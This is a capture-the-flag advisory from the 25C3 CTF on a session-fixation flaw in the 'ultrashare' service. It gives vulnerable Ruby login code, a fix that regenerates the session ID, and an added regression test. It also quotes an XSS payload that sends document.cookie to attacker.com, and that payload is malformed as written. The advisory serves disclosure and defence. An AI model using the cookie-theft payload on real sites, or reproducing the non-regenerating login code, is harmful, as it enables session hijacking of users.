HC's Capture the Flag website
25C3-CTF

Advisory #90

From team Ailuropoda Melanoleucas

New advisory by: Samsa
Affected service(s): ultrashare
Severity [lmh]: medium

===== Problem =====

The application maintains the same session ID in both zones,
the public and the private one. Consequently it is possible
to steal the session cookie with another attack, for example
an XSS in the public zone, by injecting something like:

<img src='http://www.attacker.com/'.document.cookie />

The following source code demonstrates this vulnerability:

    when "login"
      options = @db.login @cgi['username'], @cgi['password']
      if (options[:errors].length == 0) then
        @cgi.session['authorized'] = true   # <- the session ID should be regenerated at this point
        @cgi.session['user'] = @cgi['username']
        mainMenu options
      else
        showLoginForm options
      end

Once the session has been authorized, the attacker, who
already knows the session ID, can access the restricted zone.


===== Impact =====

- Access to an Admin Zone without authentication

===== Fix =====

To fix this flaw, the session must be validated before the login
process completes and a new session ID assigned if needed, so the
identifier known before authentication is never the one that becomes authorized.

    if (options[:errors].length == 0) then
      # Discard the pre-login session and issue a fresh ID before marking it authorized
      # (CGI::Session with 'new_session' => true; reassigning @cgi.session assumes the app's wrapper allows it)
      @cgi.session = CGI::Session.new(@cgi, 'new_session' => true)
      @cgi.session['authorized'] = true
      @cgi.session['user'] = @cgi['username']
      mainMenu options
    else
      showLoginForm options
    end
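As an added example (not code from the advisory or the ultrashare service), the vulnerable and the regenerating login handler side by side on a minimal in-memory session store standing in for CGI::Session, plus the regression check a defender would run: a session ID known before login must not grant access to the restricted zone afterwards. The store, the test account and the handler names are constructed for this example.

```ruby
require 'securerandom'

# Minimal in-memory session store standing in for CGI::Session (constructed for this example).
class SessionStore
  def initialize; @sessions = {}; end

  # Issues a fresh, unpredictable session id in an unauthenticated state.
  def create
    sid = SecureRandom.hex(16)
    @sessions[sid] = { 'authorized' => false }
    sid
  end

  def [](sid); @sessions[sid]; end
  def destroy(sid); @sessions.delete(sid); end
end

CREDENTIALS = { 'alice' => 'correct horse' } # constructed test account

# Vulnerable handler, mirroring the advisory: the pre-login id is simply marked authorized.
def login_vulnerable(store, sid, user, pass)
  return sid unless CREDENTIALS[user] == pass
  store[sid]['authorized'] = true
  store[sid]['user'] = user
  sid
end

# Fixed handler: the pre-login session is discarded and a new id issued before authorization.
def login_fixed(store, sid, user, pass)
  return sid unless CREDENTIALS[user] == pass
  store.destroy(sid)
  new_sid = store.create
  store[new_sid]['authorized'] = true
  store[new_sid]['user'] = user
  new_sid
end

# Regression check: log in with a session id that was already known before authentication
# and report whether that same id now grants access to the restricted zone.
def fixation_possible?(login_handler)
  store = SessionStore.new
  pre_login_sid = store.create
  login_handler.call(store, pre_login_sid, 'alice', 'correct horse')
  session = store[pre_login_sid]
  !session.nil? && session['authorized'] == true
end
```

fixation_possible? returns true for login_vulnerable and false for login_fixed; wired into a test suite it catches a reintroduction of the flaw.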


Rating

[2] Yes. You're right. Sessions should be used more carefully.

